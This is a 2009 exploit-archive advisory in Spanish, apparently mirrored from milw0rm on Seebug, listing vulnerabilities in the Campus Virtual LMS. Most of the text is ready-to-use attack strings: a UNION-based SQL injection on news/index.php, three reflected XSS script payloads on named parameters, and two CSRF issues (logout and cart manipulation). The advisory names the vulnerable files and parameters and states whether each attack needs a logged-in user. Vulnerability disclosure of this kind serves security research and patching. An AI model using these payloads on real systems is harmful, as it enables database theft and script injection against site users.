+-----------------------------------------------------------------------------+ LMS: Campus Virtual-LMS WEB: http://campusvirtualcomputrade.cae.net Autor: Yasión Fecha: 12 jun 2009 +-----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] SQLi -----------------------------------------------------------------------------+ Archivo: news/index.php [no logged] GET: ?id Inyección: -1 union select 1,2,3,4,5,6,7 -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] XSS -----------------------------------------------------------------------------+ Archivo: enrolments/step1.php [no logged] GET: ?courseid Inyección: 1"><script>alert(/xD/.source)</script> Archivo: files/shared_list.php [logged] GET/POST: ?search Inyección: "><script>alert(/xD/.source)</script><!-- Archivo: files/shared_list.php [logged] GET: ?siteid Inyección: "><script>alert(/xD/.source)</script><!-- -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] CSRF -----------------------------------------------------------------------------+ Archivo: login/logout.php Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un link... Archivo: enrolments/step2.php GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID] Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la cesta identificada por ODERID. Sería necesario conocer por adelantado la cesta del usuario. (No explotable) -----------------------------------------------------------------------------+ +-----------------------------------------------------------------------------+ Gretz: UnderSecurity.net +-----------------------------------------------------------------------------+ # milw0rm.com [2009-06-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论